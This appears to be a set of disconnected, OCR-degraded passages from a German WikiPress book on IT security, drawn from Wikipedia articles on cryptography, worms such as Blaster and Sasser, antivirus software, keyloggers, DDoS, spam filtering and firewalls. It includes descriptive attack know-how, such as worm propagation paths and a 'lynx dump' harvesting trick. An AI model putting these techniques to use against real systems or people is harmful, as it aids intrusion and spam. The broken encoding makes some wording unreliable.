rmern abgel st wurden 30 Computervirus Ein Schutz gegen Makroviren besteht darin
319. ickbauch Diddi Diesterne Dieter Heinsohn DieterFink Dirk1812 Dishayloo Djj Djoser Docva lium Dogbert Dominik Dominik witte Don Quichote DonLeone Dr eina ugige Bandit Dream Flasher Drf DrHartmann Drummerboy Drzoom Dschen Dsl 213 023 062 043 arcor ip net Due sentrieb Dundak Duraste Dwagener Dyon E3c2d6ec0ca59f4588b8bb5cb621cfa6 E7 Eagletm 323 Anhang Eborutta Echoray Ecki Eddia Eiferer Eike sauer Ein anderer EKKi Ekuah Eldred Electrocat Elian Elitemassacre Ellywa Eloquence ElRaki Elshalif Elwe Elwood j blues Elya Emi Emvee Endorphine Erd ErhardRainer ErikDunsing Ernesto Ernstl Eskimbot Este Etec47 Eugen Euri pides EvilEye Evr Expose Fab Fabian Bieker Fabian j Fabian6129 FabianLange Fairway Fake kevin Falkue Fang Ling Su Faraway Faux Fb78 Fcbaum Fcc go Fedi Felix Gr bert Felix Jong leur FelixH FelixKaiser FEXX Fgb Fgrassmann Filzstift Finanzer Finex Fink Fire Fisch1917 Fischchen FlaBot Fladi Flea Fleminra Floffm Flominator Flothi Flups Fomafix Foosel Forever more Fragment Frank A Frank Jacobsen Frank Schulenburg Frank penner FrankA Frankhoe Fredstober Freibeuter Freundlich Friedemann Lindenthal FriedhelmW Fristu Fritz Frog23 Frubi Fscken Fusslkopp FutureCrash Fuzz Fuzzy Fxb Gail Gandi Gauss Gazelle Geframuc Gene ar boit Geof GeorgGerber Geos Gerd Ewald GerhardG Geschichtsfan Gevatter Tod GFJ GGNBot G
320. ie Springer 2003 ISBN 3 540 40508 9 Ertel Wolfgang Angewandte Kryptographie Hanser 2003 ISBN 3 446 22304 5 Kahn David The Codebreakers berarbeitete Auflage Scribner Book Company 1996 ISBN 0 684 83130 9 Schmeh Klaus Die Welt der geheimen Zeichen Die faszinierende Geschichte der Verschl sselung W3L 2004 ISBN 3 937137 90 4 Schneier Bruce Angewandte Kryptographie Addison Wesley 1996 ISBN 3 89319 854 7 Singh Simon Geheime Botschaften dtv 2001 ISBN 3 423 33071 6 Wrixon Fred B Codes Chiffren amp andere Geheimsprachen K nemann 2001 ISBN 3 8290 3888 7 Quelle http de wikipedia org wiki Kryptografie Historie 19 1 02 Angelegt von Vulture danach bearbeitet von den Hauptautoren Vulture Duesentrieb Caramdir Uli g Maynard Steven Malkovich Gazelle Priwo Hagbard Zwobot Ben Zin Trias2k2 Swisscarbon HeikoStamer Heiko Hahn H farnsworth Achim Raschka Forevermore Pinguin tk Robbot Sansculotte Brazzy Stern Kubieziel Falkue Koethnig Amtiss Unukorno Haeber Ozuma PuppetMaster Fristu FrankA Cyper Akl Blubbalutsch anonym 12 1 06 1 2 06 WikiPress Redaktion 270 Kryptologie Kryptologie Die Kryptologie ist die Wissenschaft der Verschl sselung und der Ent schl sselung von Informationen sowie der Analyse kryptografischer Ver fahren zum Zweck der Bewertung ihrer St rken und Schw chen Sie umfasst dabei folgende Gebiete Kryptografie Lehre von der Verschl sselung von Inform
321. ie C sar Chiffre bei welcher ein Zeichen aus dem Alphabet als Schl ssel verwendet wird und anhand der Position des Buchstabens im Alphabet die Buchstaben des Klartextes zyklisch verschoben werden 284 Entschl sselung Codierung Beim Codieren werden alle Zeichen eines Zeichenvorrats einem anderen Zeichenvorrat zugeordnet Ein Beispiel hierf r ist die Co dierung aller alphabetischen Zeichen in den ASCII Code Literatur Schmeh Klaus Die Welt der geheimen Zeichen w3l 2004 ISBN 3 937137 90 4 Schneier Bruce Angewandte Kryptographie John Wiley amp Sons 1996 ISBN 0 471 11709 9 Singh Simon Geheime Botschaften dtv 2001 ISBN 3 423 33071 6 Quelle http de wikipedia org wiki Verschl sselung Historie 6 4 04 Angelegt von Priwo danach bearbeitet von den Hauptautoren Mkleine Wikib r Psycho Chicken Kubieziel Priwo PhilippWeissenbacher Mm freak Stern MichaelDiederich Steven Malkovich Harro von Wuff FutureCrash Mjk Hafenbar YurikBot Hirion Marcel Dunkelberg Thomas Willerich Urizen Maynard FlaBot Abubiju Montauk anonym 12 1 06 1 2 06 WikiPress Redaktion Entschl sselung Entschl sselung bzw Dechiffrierung vereinzelt auch Entzifferung engl decoding decipherment oder decryption beschreibt im weiteren Sin ne die Erkl rung bzw Deutung unbekannter Zeichen Symbole Bilder Hinweise oder anderer Artefakte bzw deren Umwandlung in bekannte Zeichen Es lassen sich unterschiedliche Gr nde
322. ie Revokation von Zertifikaten ist nicht sofort allgemein bekannt wie in einer PKI Software Die bekanntesten Umsetzungen der Idee des Web of Trust in der Praxis sind wohl das kommerzielle Programm Pretty Good Privacy und dessen Open Source Variante GNU Privacy Guard Quelle http de wikipedia org wiki Web_of_Trust Historie 26 5 04 Angelegt von GeorgGerber danach bearbeitet von den Hauptautoren GeorgGerber Aquin Stern Dogbert JensKohl Steven Malkovich Achim Raschka Tillwe Priwo Victor H Mullkubel anonym 12 1 06 1 2 06 WikiPress Redaktion Public Key Infrastruktur Als Public Key Infrastruktur PKI engl public key infrastructure be zeichnet man in der Kryptologie und Kryptografie ein System wel ches es erm glicht digitale Zertifikate auszustellen zu verteilen und zu pr fen Die innerhalb einer PKI ausgestellten Zertifikate sind meist auf Personen oder Maschinen festgelegt und werden zur Absicherung com putergest tzter Kommunikation verwendet Der zu Grunde liegende Gedanke ist der folgende Mit Hilfe eines Public Key Verschl sselungsverfahrens k nnen Nachrichten im Inter net signiert und verschl sselt werden Das Signieren garantiert dass die Nachricht in dieser Form wirklich vom angegebenen Absender stammt Allerdings ben tigt man hierzu den Public Key des Absenders Dieser k nnte z B per E Mail versendet werden Es stellt sich genau an diesem Punkt aber die Frage wie man sicher ist dass es
323. ie Systeme der Nutzer f r einen zu k nftigen Angriff pr pariert 70 W32 Blaster Der Wurm tritt mittlerweile in f nf Varianten auf Variante A Variante B bei dem die Wurmdatei in penis32 exe umbenannt wurde Variante C bei dem die Wurmdatei in teekids exe umbenannt wurde Variante D in Kombination mit dem Trojaner BKDR_LITH 103 A der eine Backdoor installiert Variante E tr gt unter anderem die Bezeichnungen Nachi Welchia und Lovsan D Der Sch dling sucht auch auf dem TCP Port 135 nach verwundbaren Windows Systemen im Internet Alternativ sendet der Wurm Daten ber den TCP Port 80 um das im M rz 2003 entdeckte WebDAV Sicherheitsloch zur Verbreitung zu nutzen ber das RPC Leck greift der Wurm nur Maschinen mit Windows XP an w hrend ber die WebDAV L cke sowohl Systeme mit Windows 2000 als auch XP attackiert werden Zu erkennen ist er an massiv vielen ICMP Floo dings im lokalen Netz Erkennung Eine Infektion durch W32 Blaster l sst sich folgenderma en erkennen Links unten auf Start klicken dann auf Suchen und jetzt auf Nach Dateien und Ordnern Dann nach msblast exe suchen Nach penis32 exe suchen Nach teekids exe suchen Findet der Rechner eine der Dateien ist der Computer infiziert Alternative Erkennung f r Fortgeschrittene Wenn das Dateisystem sehr gro ist dann dauert es vielleicht etwas zu lange alle Festplatten zu durchsuchen In diesem Fall kann der Befall auch in der Regist
324. ie Viren der Netsky Reihe verantwort lich Sasser wird nicht als E Mail Anhang versandt Sobald sich ein Be nutzer mit dem Internet verbindet nutzt der Wurm einen Fehler in ei nem Windows Systemdienst mit dem Namen Local Security Authority Subsystem Service LSASS aus Findet er einen verwundbaren Rechner infiziert er ihn mit einem Code der den eigentlichen Wurm von bereits infizierten Rechnern kopiert Dazu startet er auf Port 5554 einen FTP Server Der befallene Rechner wird von dem Wurm in unregelm igen Ab st nden ein und ausgeschaltet Der materielle Schaden ist dabei schwer zu bemessen da es sich bei den Sch den im Wesentlichen um allgemeine Produktivit tsverluste in Unternehmen bzw um M ngel in der Erreich barkeit und Nutzbarkeit von Internetseiten durch die Kunden handelt Innerhalb kurzer Zeit sind von dem Wurm mehrere Varianten auf getaucht Sasser B Sasser C und Sasser D das Original wird Sasser A ge nannt Zudem nutzt ein E Mail Wurm mit dem Namen Netsky AC die Angst von Anwendern vor Sasser aus Als Absender gibt er sich als ein Hersteller von Antivirensoftware aus und tarnt sich unter anderem als Programm zum Entfernen von Sasser B Ein weiterer Wurm mit dem Namen Phatbot schlie t normalerweise die Hintert ren die andere W rmer ge ffnet haben und l scht beispielswei se bei den W rmern Beagle oder Mydoom den Sch dling Sasser jedoch wird von Phatbot ver ndert um alle IP Adressen des Wurms herauszu
325. ie zur Besei tigung der sch dlichen Software unternommen Da st ndig neue Viren und W rmer im Umlauf sind m ssen die entsprechenden Listen st ndig aktualisiert werden Erwirbt man ein Antivirenprogramm so beinhaltet dies meist Aktualisierungen f r Virensignaturen von einem Jahr Wird ein Virensignatur basiertes Antivirenprogramm ber mehrere Wochen oder gar Monate nicht aktualisiert ist es faktisch wertlos und kann allen falls noch einen Grundschutz bieten Um dies zu verhindern bieten viele Programme automatische Update Routinen und entsprechende Hinweise auf zu alte Signaturen oder darauf dass die Lizenz in K rze abl uft Virenscanner arbeiten meist auf folgende Arten On Access Scanner Der Echtzeitscanner engl On Access Scanner auch Zugriffsscanner genannt ist im Hintergrund als Systemdienst aktiv und scannt alle Dateien Programme den Arbeitspeicher und evtl den HTTP wie den FTP Verkehr Um dies zu erreichen werden so genannte Filtertreiber vom Antivirenprogramm installiert welche die Schnittstelle zwischen dem Echtzeitscanner und dem Dateisystem bereitstellen Ge nerell muss beim Echtzeitschutz zwischen zwei Strategien unterschieden werden Scannen beim ffnen von Dateien Lesevorgang Scannen beim Erstellen ndern von Dateien Schreibvorgang 76 Antivirenprogramm Bei einigen Virenscannern l sst sich diese Strategie einstellen bei anderen ist sie unver nderlich im Programm konfiguriert Da Schreibvor
326. ieben zu einem Arbeitsausfall Anfang Mai 2004 erlitt eine Anzeigetafel des Flughafens Wien Schwechat durch den Wurm Sasser kurzfristig einen Totalausfall Auswirkungen hatte dies aber nur auf das interne Informati onssystem und konnte durch einen Neustart des betroffenen Computers be hoben werden Es entstanden keine Sch den nicht einmal eine Versp tung SQL Slammer wiederum belastete stellenweise die Internet Infrastruktur derart dass vielerorts die Verbindungen komplett zusammenbrachen Einen weiteren wirtschaftlichen Schaden k nnen in Zukunft Handy w rmer nach sich ziehen die sich ber MMS verbreiten Wenn ein solcher Wurm dutzende kostenpflichtige MMS verschickt ist mit einem hohen finanziellen Verlust zu rechnen Weitere finanzielle Sch den k nnen durch so genannte Distributed Denial of Service Attacken entstehen Wie am Beispiel W32 Blaster ersichtlich ist k nnen dadurch sogar gro e Betriebe wie SCO oder Micro soft in Bedr ngnis gebracht werden Kopfgeld auf Wurmautoren Im November 2003 gr ndete Microsoft ein so genanntes Anti Virus Re ward Program um weltweit die Jagd auf Verantwortliche f r die Verbrei tung von W rmern und Viren zu unterst tzen Bei der Gr ndung erhielt die Initiative ein Startkapital von 5 Millionen US Dollar wovon bereits ein Teil f r die Ergreifung und Verurteilung aktueller Wurm Verbreiter zur Belohnung ausgesetzt wurde Damit will Microsoft die zust ndigen Ermittlungsbeh rden bei der
327. iert zu bezeichnen Nichtsdestotrotz k nnen Verbraucher je doch auch jederzeit nichtzertifizierte Software verwenden da ein aktives Eingreifen in das System in den Spezifikationen nicht vorgesehen ist und wohl auch kaum durchsetzbar wird Von Kritikern wird die Bef rchtung ge u ert dass die Spezifikation der TCG die Entwicklung von Open Source Shareware und Freeware zumindest behindern k nnen Dies resultiert aus der Vermutung dass weder kleinere Firmen noch Privatleute sich die hohen Kosten f r die of fizielle Zertifizierung ihrer Programme leisten k nnen M glicherweise k nnten TCG Mitglieder den Herstellern konkurrierender Software wie OpenOffice oder Firefox die Zertifizierung erschweren oder diese sogar g nzlich verhindern Das bis heute ffentliche Misstrauen gr ndet sich aus der Anfangspha se des Projektes Die anf nglichen Verbreitungskonzepte der TCPA sahen vor dass das System ohne gro e ffentliche Pr sentation in alle neu ver kauften Computer integriert wird und es dem Benutzer nicht m glich sein 126 Digital Rights Management sollte dieses zu deaktivieren Im brigen eignet sich dieses Sicherheits konzept auch dazu Digital Rights Management effektiv durchzusetzen Das ist allerdings auch ohne Trusted Computing m glich Literatur Koenig Neumann Trusted Computing Verlag Recht und Wirtschaft Heidelberg ISBN 3 8005 1341 2 Quelle http de wikipedia org wiki Trusted_Computing_Group Historie 21
328. ierten Programmcodes erweitert bzw anderweitig ver ndert Durch die Verwendung ihrer eigenen CrackMes entwickelte sich dar aus ein Sport auf geistiger Ebene Da ihnen der Programmcode nur als Maschinencode oder als Zwischencode z B Intermediate Language oder Java Bytecode vorliegt kommt das Knacken eines CrackMe einem Wett kampf im Bereich des Reverse Engineerings gleich Durch ihre T tigkeit werden sie nicht selten zu exzellenten Softwareentwicklern und System analytikern Obwohl nur einige wenige Software Cracker ihre F higkeiten dazu missbrauchen widerrechtlich den Kopierschutz kommerzieller Software zu entfernen werden sie in den Medien h ufig pauschal kriminalisiert Cracker als Kopierschutz Entferner Bereits sehr fr h Ende der 1970er Anfang der 1980er Jahre wurde damit begonnen kommerzielle Software hier insbesondere Computerspiele mit mehr oder weniger ausgekl gel ten Kopierschutzmechanismen zu versehen Urspr nglich entstand der Vorgang des Crackens also aus dem Vorsatz heraus diese Software f r 171 Sonstige Themen sich selbst oder f r befreundete Computerbenutzer in einen kopierbaren Zustand zu bringen Einzelne Cracker waren dabei so erfolgreich dass sie das Cracken zu einer Art Passion machten meistens unter Verwendung eines anonymisierenden Crackernamen Pseudo Handle In den fr hen 1980er Jahren entstanden hieraus Crackergruppen und der sich auf das Cracken von Software spezialisierende Teil de
329. ierung der Zeichen in der Form amp x61 amp x40 8 amp 98 amp x2e amp x63 stellt f r Adresssammler kein Hindernis dar da beispielsweise der Kommandozeilen f hige Browser lynx die Adressen korrekt auslesen kann lynx dump lt url gt grep H ufig wird auch eine Verschl sselung mittels Javascript vorge schlagen Um diese zu knacken muss der Harvester einen Javascript f higen Browser integrieren Dies stellt eine etwas h here H rde dar schlie t allerdings Nutzer von Browsern die kein JavaScript unterst t zen aus Eine hohe Sicherheit bieten auch so genannte Captchas mittels derer Menschen von Maschinen unterschieden werden sollen So wird vor geschlagen die E Mail Adresse in einem Bild anzugeben oder in einer Audio Datei zu buchstabieren Allerdings sind diese L sungen weder be sonders komfortabel noch barrierefrei Auch bei einer Angabe als Audio Datei und Bild sind sie zum Beispiel f r Taubblinde unverst ndlich Im Usenet und auf Mailinglisten kann auch im From Header eine nicht gelesene M ll Adresse und bei Reply To die eigentliche Adres se eingetragen werden Damit kommen Antworten an der korrekten Adresse an die T ter scannen aber normalerweise nur die From Adres sen Auf Webseiten stellen Kontaktformulare CGI oder PHP eine gute Al ternative zur Angabe der E Mail Adresse dar Sie bieten dem Leser eine komfortable M glichkeit zur Kontaktaufnahme mit dem Webseitenbe treiber verh
330. iese Einschr nkung mag als unwesentli che Kleinigkeit erscheinen denn es bleiben ja noch 25 weitere Buchstaben des Alphabets zur Verschl sselung tats chlich bedeutet dies jedoch eine drastische Reduzierung des Schl sselraums und dar ber hinaus eine neue Angreifbarkeit des Geheimtextes Zum anderen verursacht die Umkehrwalze dass die Permutation und damit die Verschl sselung involutorisch wird Hierdurch verringert sich der Schl sselraum noch weiter Die durch die Umkehrwalze eingef gten Schw chen insbesondere die Reduzierung des Schl sselraums lassen sich leicht klarmachen wenn man statt von 26 Buchstaben vereinfacht von einem Alphabet von bei spielsweise nur vier Buchstaben ausgeht Mit vier Buchstaben lassen sich 4 24 unterschiedliche Alphabete damit meint der Kryptograph unterschiedliche Anordnungen der Buchstaben erzeugen n mlich ABCD ABDC ACBD ACDB ADBC ADCB BACD BADC BCAD BCDA BDAC BDCA CABD CADB CBAD CBDA CDAB CDBA DABC DACB DBAC DBCA DCAB DCBA 305 Kryptografie Beschr nkt man sich hier statt auf alle 24 m glichen nur auf die fix punktfreien Permutationen so fallen alle Alphabete weg bei denen ein Buchstabe in sich selbst verschl sselt wird also auf seinem nat rlichen alphabetischen Platz steht Aus der obigen Liste sind damit die folgenden f nfzehn Alphabete zu streichen da sie einen oder mehrere Fixpunkte aufweisen Das ist bereits mehr als die H lfte ABCD ABDC ACBD ACDB ADBC ADCB BACD BCA
331. ieser Programme werden Festplatte und Arbeitsspeicher nach schadlichen Programmen durchsucht Antivirenprogramme bieten meist zwei Betriebsmodi einen manuellen bei dem das Antivirenprogramm erst auf Aufforderung des Benutzers alle Dateien einmalig tiberpriift on demand und einen automatischen bei dem alle Schreib und Lesezugriffe auf die Festplatte teilweise auch auf den Arbeitsspeicher und damit auch ee Jettis Malwarescan 2 99 TRANSITION TO_3 00 0 Datei die hochgeladen und I E RE S aR E A gescannt werden soll Durchsuchen Abschicken E S Auslastung 0 z J100 Datei Santy pl Status INFIZIERT MALWARE Entdeckte Packprogramme Antivir gefunden Arcavir gefunden Avast gefunden AVG Antivirus gefunden BitDefender gefunden I Clamavl gefunden 0 Dr Web gefunden F Prot Antivirus gefunden Fortinet gefunden Kaspersky Anti virus gefunden NOD32 gefunden m gliche Variante Norman Virus Control gefunden UNA Keine Viren gefunden 8432 Keine Viren gefunden Abb 1 Ein Online Scanner erkennt ein Virus 27 Viren W rmer Trojaner E Mail Anh nge und sonstige Downloads berpr ft werden on access Es gibt Antivirenprogramme die mehrere f r das Scannen nach Viren verantwortliche Engines nutzen Wenn diese unabh ngig voneinander suchen steigt die Erkennungswahrscheinlichkeit Antivirenprogramme bieten nie vollst ndigen Schutz da die Erkennungs rate selbst bei bekannten Viren
332. ifenden Rechner stark zu erh hen Eine DDoS Attacke erzielt den Schaden meistens durch die berlastung der angegriffenen Systeme 210 Denial of Service Die beobachteten Angriffe basierten auf zwei wesentlichen Schwachstel len Zum einen konnten die Absenderadressen der angreifenden Da tenpakete gef lscht werden IP Spoofing zum anderen konnte vor dem eigentlichen Angriff auf einer gro en Anzahl dritter nur unzureichend gesch tzter Internet Rechner unberechtigterweise Software installiert werden die dann ferngesteuert durch massenhaft versendete Datenpake te den eigentlichen Angriff ausf hrten Das Besondere an diesen DDoS Angriffen ist dass diese daher auch diejenigen treffen k nnen die sich ansonsten optimal vor Eindringlingen aus dem Internet gesch tzt haben Insofern sind Rechner auf denen noch nicht einmal so genannte Grund schutzma nahmen umgesetzt sind nicht nur f r den jeweiligen Betreiber eine Gefahr sondern auch f r alle anderen Computer im Internet Popularit t Versuche eine Denial of Service herbeizuf hren sind inzwischen po pul r So hielt Lycos einen Bildschirmschoner bereit mit dem eine De nial of Service bei Internet Rechnern die als Spam Versender verd ch tigt werden erreicht werden soll Diese Aktion ist jedoch mittlerweile gestoppt Sie diente auch lediglich dazu die Diskussion ber Spam neu zu entfachen Letztlich sind DDos Attacken jedoch keinesfalls Kavaliers delikte sonder
333. ig Gimbal Gmoeller GNosis Gnu1742 Goodkarma Gorgo Gorwin Gosu Gpf Gpvos Grander Graui Gree Gregor Bert Grimmi59 rade Grisutheguru Gronau Grotej Gruftelfe Gr mpfm Guety Guido Arnold Guidod Guillermo Guizza Gulli Gumbel Gum Mib Aer Gunfighter 6 Gun ter krebs Gunther Gurt Guru Gurumaker Gwe H farnsworth Haasalex Habakuk Hadhuey Ha eber Hafenbar Hagbard Haize Hajile Hajuero HAL Neuntausend Hamsta Hanno Behrens Han sele Hansmi Harald M hlb ck Harald Spiegel Harold1977 Harpax Harro von Wuff HaSee Hashar HaukeZuehl Hausmeistah HbJ Head Headbert Heckmotor Hedavid Heidas Heiko A Heiko Engelke Heiko Hahn HeikoStamer Heinte HelgeD Heliozentrik Hella Hendrik Brummer mann Hendrik vm HenHei Henriette Fiebig HenrikGebauer HenrikHolke Hermannthomas Hernani Herr Schroeder Herr Th Herrklaus Herzl Heurik Heyko Hfst Hhdw Hieke Hijackal Hildegund Himuralibima Hinrich Hirion Hoch auf einem Baum Hoheit HoHun HolgerK Horst Frank HoSe Hostelli H P Hr HsT Hubertl Hubi Huebi Hunding Hunter Hutch Hutschi HvL Iblue IceHand Ich Ich hab hunga Ichdertom Idler IGEL Igelball Igrimm12 Ikar us Ilja Lorek Immanuel Giel Incase Industrializer Ing Ingo B Ingo Weisem ller Inode Interactive Inzane IP X Iqfisch Irongate Ixitixel J budissin J Schmitt J mach wust J Schwerdtfeger Jackalope Jacks grin sende Rache Jacob koehler Jahnbes Jailbird Jak
334. iger Systemzu st nde oder der Auswertung von Benutzerverhalten sind problematisch Allerdings hat auch die TCG keinen Wunderalgorithmus vorzuweisen trotzdem garantiert sie das Problem in Hardware angemessen zu l sen Verbreitung Das TPM wird derzeit bereits von nahezu allen namhaften PC Herstellern in den Produktreihen die das Professional Segment addressieren ange boten Softwareseitig wird das TPM haupts chlich von zwei Anbietern unter st tzt HP Dell sowie IBM bieten eine Integration auf Ihren Rechnern an Infineon bietet als Hersteller der TPM Chips ebenfalls eine umfassen de Software L sung an die derzeit Sommer 2005 auf fast allen ande ren Plattformen vertreten ist Dabei gibt es auch Mischformen wenn beispielsweise das TPM Modul in den Ethernet Chip integriert ist Broadcom und die Software on top auf Infineon basiert Quelle http de wikipedia org wiki Trusted_Platform_Module Historie 21 4 03 Angelegt von Igelball danach bearbeitet von den Hauptautoren Klaus Jesper Unriddler HeikoStamer Igelball Diddi Foosel Heinte Kubieziel Jed Steven Malkovich StephanKetz Neil Carter Katharina DaMutz IP X BWBot MichaelDiederich Head anonym 12 1 06 1 2 06 WikiPress Redaktion 119 Software Kopierschutz Als Kopierschutz bezeichnet man Ma nahmen die Daten davor sch tzen sollen von Unbefugten vervielf ltigt zu werden Einen perfekten Kopierschutz gibt es nicht da die Daten auf einem Datent
335. ikiPress Redaktion Keylogger Ein Keylogger ist eine Hard oder Software die dazu verwendet wird die Eingaben des Benutzers an einem Computer mitzuprotokollieren und dadurch zu berwachen oder zu rekonstruieren Keylogger werden bei 82 Rootkit spielsweise von Hackern bzw Crackern verwendet um an vertrauliche Daten etwa Kennworte oder PINs zu gelangen Software Keylogger schalten sich zwischen Betriebssystem und Tasta tur um die Eingaben erst zu lesen und dann an das Betriebssystem wei terzugeben Manche Keylogger speichern die Eingaben auf der Festplatte des berwachten Rechners andere senden sie ber das Internet an einen anderen Computer Hardware Keylogger erfordern einen unmittelbaren physischen Zu gang zu dem betroffenen Computer Sie werden in Situationen verwen det in denen eine Installation von Software Keyloggern nicht m glich nicht sinnvoll oder zu aufwendig ist Hardware Keylogger werden direkt zwischen Tastatur und Rechner gesteckt und k nnen somit innerhalb von Sekunden angebracht werden Sp ter werden sie dann wieder entfernt Die von ihnen protokollierten Eingaben werden dann an einem anderen Computer ausgelesen Im Gegensatz zu Software Keyloggern hinterlas sen die Hardware Keylogger keine verr terischen Datenspuren auf dem berwachten Rechner allerdings sind sie auch relativ einfach daran zu er kennen dass auf einmal ein verd chtiges Ger t zwischen Computer und Tastatur h ngt solange
336. ildungen stammen von http de wikipedia org oder von http commons wikimedia org Nicht aufgef hrte Bilder sind gemeinfrei Abb 7 GFDL Quelle http de wikipedia org wiki Bild Konzeptioneller_Aufbau_ einer_Firewall png Zinnmann Abb 8 Freigegeben Quelle http de wikipedia org wiki Bild Personal_firewall png Harald M hlb ck Abb 9 GPL Quelle http de wikipedia org wiki Bild Screenshot_firestarter_policy png Harald M hlb ck Abb 10 GFDL Quelle http de wikipedia org wiki Bild NGSCB Diagramm png Daniel G hler Abb 11 CC by sa 2 0 de Quelle http de wikipedia org wiki Bild DRMS png Prussio Abb 13 GFDL Quelle http de wikipedia org wiki Bild Ccc2003PirateTent jpg Paul Vlaar Abb 14 GFDL Quelle http de wikipedia org wiki Bild Q33NY png Immanuel Giel Abb 15 CC by sa 2 0 de Quelle http de wikipedia org wiki Bild Emailverfassen jpg Anneke Wolf Abb 16 CC by sa 2 0 de Quelle http de wikipedia org wiki Bild E mail_spam jpg Roger Zenner Abb 17 GFDL Quelle http de wikipedia org wiki Bild Daper hackertales jpg Evrim Sen Abb 19 GFDL Quelle http de wikipedia org wiki Bild Phishingdemorp jpg Anton Abb 22 GFDL Quelle http de wikipedia org wiki Bild WLAN_im_Privathaushalt png Stern Abb 23 GFDL Quelle http de wikipedia org wiki Bild Zelltopologie_neu gif Stern Abb 24 GFDL Quelle http de wikipedia org wiki Bild
337. im Internet geht in die Millionen belt ter wechseln h ufig das Wohnhaus d h ihre IP Adresse F r einen wirklichen Schutz ist der Verwaltungsaufwand zu gro Deshalb geht man oft den umgekehrten Weg und stellt folgende Regel auf Lass nur Pakete durch die von der IP Adresse 2 3 4 5 kom men Prinzipiell ist dies aber auch kein wirklich sicherer Weg da ein belt ter die Hausnummer ohne gr ere technische Probleme f lschen 89 Software kann Eine sichere Kommunikation z B zwischen Firmennetzen ist nur m glich wenn Protokolle verwendet werden die eine Autorisation und Authentifikation der beteiligten Benutzer oder Systeme vornehmen Dies kann beispielsweise mit virtuellen privaten Netzwerken gesche hen Content Filter Eine Firewall kann aber nicht nur auf der niedrigen Ebene des Paketfilters arbeiten sondern auch komplexere Aufgaben ber nehmen Ein Content Filter berpr ft zum Beispiel die Inhalte der Pakete und nicht nur die Meta Daten der Pakete wie Quell und oder Zieladresse Solche Aufgaben k nnen zum Beispiel folgende sein Herausfiltern von ActiveX und oder JavaScript aus angeforderten HTML Seiten Filtern Kennzeichen von Spam Mails L schen von Viren Mails Herausfiltern von vertraulichen Firmeninformationen z B Bilanz Die meisten Systeme lassen nur die Definition von sehr einfachen Re geln zu das Problem ist aber prinzipiell sehr komplex und das Konzept ist eventuell technisch nicht vollst ndig um
338. imal 2 Als Verschl sselung ist nur WEP m glich da keine dynamisch ver teilten Schl ssel vergeben werden k nnen Seit kurzem ist auch WPA2 m glich dies allerdings nur bei wenigen Herstellern etwa AVM oder Linksys und auch dort nur mit exakt derselben Hardware und be stimmten Firmwareversionen Gesellschaftliches In bestehenden Netzen sind die Endverbraucher um gro e Provider ver sammelt ber die der Datenverkehr relativ zentral abgewickelt wird was diese Provider in eine m chtige Position bei der Kontrolle des Datenver kehrs hebt Der Benutzer tritt hier relativ konsumorientiert am Rande der Netzwerke auf Durch Wegfall der Kosten einer teuren kabelgebundenen Infra struktur k nnen B rgerschaften mit dieser Technik ffentliche Net ze errichten Bildlich wird gerne das Entstehen einer Datenwolke im ther als frei verf gbares Allge meingut ber einer Gemeinde ge schildert Ihr volles Potenzial ent wickelt diese Idee durch Protokolle Abb 24 NETGEAR Wireless LAN PCMCIA Karte f r Mesh Netze MANET Mobiles f r Notebooks Ad hoc Netz Obwohl die WLAN Technik f r die physikalische Bereitstellung eines Netzwerks im oben genannten Sinne Vorteile bietet gibt es auch Nachteile Der geringste d rfte f r die Umwelt wohl die Unsicherheit und das Risiko der Daten bertragung sein die nie aus der Welt zu schaffen sein wird Viel bedenklicher ist die zunehmende Belastung unserer Umwelt durch Mikrowellenstrahlung Der Me
339. immten Aus dr cken bzw Stichworten aus einer Blacklist Ist der Ausdruck bzw das Stichwort in der E Mail enthalten wird die E Mail aussortiert Diese Blacklists m ssen im Allgemeinen manuell erstellt werden und sind ent sprechend aufwendig zu verwalten Au erdem ist die Trefferquote nicht sehr hoch da hin und wieder Spam als gute E Mail und gute E Mail als Spam einsortiert werden k nnen Auch lassen sich solche Filter leicht umgehen Steht z B Viagra in der Blacklist wird der Filter Vla gr a nicht erkennen L sst der Filter die Eingabe von regul ren Ausdr cken zu kann man jedoch entsprechend ausgefeilte Filtermuster verwenden die alle denkbaren Schreibweisen ber cksichtigen z B v 0 1 i l 1 0 1 adada 0 1 g 0 1 r 0 1 adaaa Eines der bekanntesten Programme unter Linux und anderen Unix Derivaten ist SpamAssassin das jede Mail nach verschiedenen Kriterien offensichtlich ung ltige Absender bekannte Spam Textpassagen HTML Inhalt in die Zukunft datierte Absendedaten etc bepunktet und ab einer bestimmten Punktzahl als Spam klassifiziert Ebenfalls mit Blacklists ar beitet SPAVI das au er der jeweiligen E Mail auch noch die in der E Mail verlinkten Seiten auf verd chtige Begriffe untersucht Razor und Pyzor wiederum erzeugen zu jeder Mail einen Hash Wert und berpr fen in zentralen Datenbanken ob andere Personen die diese Mail ebenfalls erhalten haben sie als Spam klassifiziert haben
340. imschrift systematisch entschl sselt wird Schmeh Klaus Die Welt der geheimen Zeichen ISBN 3 937137 90 4 Singh Simon Geheime Botschaften ISBN 3 423 33071 6 Stinson Douglas R Cryptography Theory and Practice ISBN 1 58488 206 9 Quelle http de wikipedia org wiki Kryptoanalyse Historie 16 9 03 Anonym angelegt danach bearbeitet von den Hauptautoren Felix Jongleur DaTroll Kubieziel Nerd Akl Stern Rat Cyrusdreams Fab Steven Malkovich Purodha Achim Raschka Hendrik Brummermann AndreasPraefcke Aporia tiger Mjk 4Li3N51 Trugbild Karl Henner MFM Forevermore Fgb FlaBot Zwobot Stefan Kiihn Paddy anonym 12 1 06 1 2 06 WikiPress Redaktion 275 Kryptografie Symmetrisches Kryptosystem Ein symmetrisches Kryptosystem ist ein Kryptosystem welches im 53 t i tri k Gegensatz zu einem asymmetri klar Gera schen Kryptosystem den gleichen text Mens text Schl ssel zur Ver und Ent schl sselung verwendet Bei man Abb 29 Verschl sselung mit geheimem Schl ssel chen symmetrischen Verfahren z B IDEA ist es daf r zun chst notwendig den Verschl sselungs schl ssel in einen Entschl sse lungsschl ssel zu transformieren Man teilt die symmetrischen Verfahren in Blockchiffren und Abb 30 Entschl sselung mit geheimem Schl ssel Stromchiffren auf Mit Stromchiff ren wird der Klartext Zeichen f r Zeichen ver bzw entschl sselt um den Zieltext zu erhalten Ein Blockchiffre arbeite
